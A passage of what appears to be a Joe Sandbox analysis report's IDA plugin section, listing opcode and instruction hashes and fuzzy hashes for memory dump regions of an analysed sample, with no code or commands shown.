                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: ab5550c6d2ce147ff363737d752a8c2b7e0c660e20e4e9a0aff2c0b975cc6443
                                                                                                                                                              • Instruction ID: 86c38f8e8682b57192a654576ea1e7d9d0117faece5c592b8746572f4458ed43
                                                                                                                                                              • Opcode Fuzzy Hash: ab5550c6d2ce147ff363737d752a8c2b7e0c660e20e4e9a0aff2c0b975cc6443
                                                                                                                                                              • Instruction Fuzzy Hash: DED05E4071D98557EB0973F828266FA5A909F49300F2401B9A059831D7DC0C98028202
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: a9cffcfe39f778557d21869a5f18db20b4eff5f03a679ac1b4ffff8e40f48eb3
                                                                                                                                                              • Instruction ID: d2c72905893f2c47ec0568a4cfcae7bffc8675f87deef619b2a8d3e54d7fe040
                                                                                                                                                              • Opcode Fuzzy Hash: a9cffcfe39f778557d21869a5f18db20b4eff5f03a679ac1b4ffff8e40f48eb3
                                                                                                                                                              • Instruction Fuzzy Hash: 41D05E4070D9894BE74977F83826AE95A90EF44340F2401B9E09A831D7DC0C94424102
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 6ef5f59c9f6fd3eea960324735ff6cdde419caf5bfbb8adcc2f75aaf52f28eaf
                                                                                                                                                              • Instruction ID: a3a6515389df83d72dbc9d2bbe4d962f86e7bb829b107baf69c59f739ca708ed
                                                                                                                                                              • Opcode Fuzzy Hash: 6ef5f59c9f6fd3eea960324735ff6cdde419caf5bfbb8adcc2f75aaf52f28eaf
                                                                                                                                                              • Instruction Fuzzy Hash: 21D05E4071D9814BE30977FC39267AA5A90DF48300F2401BDA169831D7DC1C94064102
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 16b1854cc3e4ad24aceddde01ca0941a866e98828e39a6b24b98c40072dfc2e1
                                                                                                                                                              • Instruction ID: 6a79069e6cdbd4b313128d8c8a67858cac1aebadd55e4630f86fe52f6a988c0e
                                                                                                                                                              • Opcode Fuzzy Hash: 16b1854cc3e4ad24aceddde01ca0941a866e98828e39a6b24b98c40072dfc2e1
                                                                                                                                                              • Instruction Fuzzy Hash: E0D05E4070D9855BE70A73F8282B7B99AD4AF54200F2401FDA069831D7DC1C95024102
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 64c32814da7791c2e800559e462931dbf0b80cc17937fac44b686b94224b3a5e
                                                                                                                                                              • Instruction ID: e9a371c156ada528eb31c557412dfd222c7dd7ac50684f7d2c7b4d073d832277
                                                                                                                                                              • Opcode Fuzzy Hash: 64c32814da7791c2e800559e462931dbf0b80cc17937fac44b686b94224b3a5e
                                                                                                                                                              • Instruction Fuzzy Hash: FDC0123252CA4A47D745B750E461CEEB3A0BF94214F811A39F057510B9ED68A685C583
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 15bc888507ec8fbe67a894398ddd5c5141145b3ec324d2584960769153868ecb
                                                                                                                                                              • Instruction ID: c72bc510aa9f43866e805348b71836ce864241088f1e7c06b96c5dddd32dc260
                                                                                                                                                              • Opcode Fuzzy Hash: 15bc888507ec8fbe67a894398ddd5c5141145b3ec324d2584960769153868ecb
                                                                                                                                                              • Instruction Fuzzy Hash: C7C08043B1DC4D0FEEE89A5C58214967750ABF5740F450177F04F450A6DD1476425391
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 9d3990e9f0cf11369c6b7971ee5bb6d7311454ab7b539d8f22b9f981a1ef5ec5
                                                                                                                                                              • Instruction ID: 0af4556c69b86d671b5e7c899eac64a532360caacc38f8fbd8607204fab90e4c
                                                                                                                                                              • Opcode Fuzzy Hash: 9d3990e9f0cf11369c6b7971ee5bb6d7311454ab7b539d8f22b9f981a1ef5ec5
                                                                                                                                                              • Instruction Fuzzy Hash: C7C0128690AFC54BE7999E780075A611B90CE66440708048D41E586492DA0425168340
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 296b82b3d92a1522eae18edad8fa7a2100c2e42f157fffa9bb14aa73027f2511
                                                                                                                                                              • Instruction ID: a5073db36b53957d435a5523bb27118bfd9a85961e85c9fb033ed751ebf9460c
                                                                                                                                                              • Opcode Fuzzy Hash: 296b82b3d92a1522eae18edad8fa7a2100c2e42f157fffa9bb14aa73027f2511
                                                                                                                                                              • Instruction Fuzzy Hash: B2B0124372FBD507D717579C68182289FA2ABC769438881FBD0895E0E7680159018351
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 1048a3af48d6140c3f6072549b8881c07ed73e981150b425294a7b5846bdc895
                                                                                                                                                              • Instruction ID: 07877fd0de621fba344c9da3fb313390252e432ea34982e3e8d7fac0cd78c6a7
                                                                                                                                                              • Opcode Fuzzy Hash: 1048a3af48d6140c3f6072549b8881c07ed73e981150b425294a7b5846bdc895
                                                                                                                                                              • Instruction Fuzzy Hash: 50A0020714A6E16F9612016AE82BDD76FA488861213065193D2806946258094886A1A3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: R_H
                                                                                                                                                              • API String ID: 0-21197713
                                                                                                                                                              • Opcode ID: c85b35d07f98c41aa16354b9a3baa5baf0bfd83f9a0764d80a0797f155d9cdde
                                                                                                                                                              • Instruction ID: 6e110326b3bfc0f91b8fbfb7a9091da6bf2f89d84d616d275923a1084c12e7c5
                                                                                                                                                              • Opcode Fuzzy Hash: c85b35d07f98c41aa16354b9a3baa5baf0bfd83f9a0764d80a0797f155d9cdde
                                                                                                                                                              • Instruction Fuzzy Hash: 90518662B0DA9A0FE3ADDB6C48B52B13BC1EFA911070501FED489C73DBDC189902C7A1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: f80d484ba0173c5fea1ce38f26984f34acd6fcd50a1922652c042ab5132f998f
                                                                                                                                                              • Instruction ID: d5b2c35edda5516ef5e64800251667b2e6ef81d114314cff15e70c72a3cced7b
                                                                                                                                                              • Opcode Fuzzy Hash: f80d484ba0173c5fea1ce38f26984f34acd6fcd50a1922652c042ab5132f998f
                                                                                                                                                              • Instruction Fuzzy Hash: 78F14630739F1E4BE32DCF5594D15B93392EB98701B664A3CC9EB835A6EE24B5134AC0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 4eaec090d138de3b50218220fcdaa110cbd43b1526583482065d4e60cc61e812
                                                                                                                                                              • Instruction ID: a10de6aa543feefb1359add42b996d7a92169986583a41b1d61fcbeb3d03f080
                                                                                                                                                              • Opcode Fuzzy Hash: 4eaec090d138de3b50218220fcdaa110cbd43b1526583482065d4e60cc61e812
                                                                                                                                                              • Instruction Fuzzy Hash: 81C15C72B0DA890FE76DAB7C58665B97BD1EF95210F0841BFD09AC31E7ED2958078301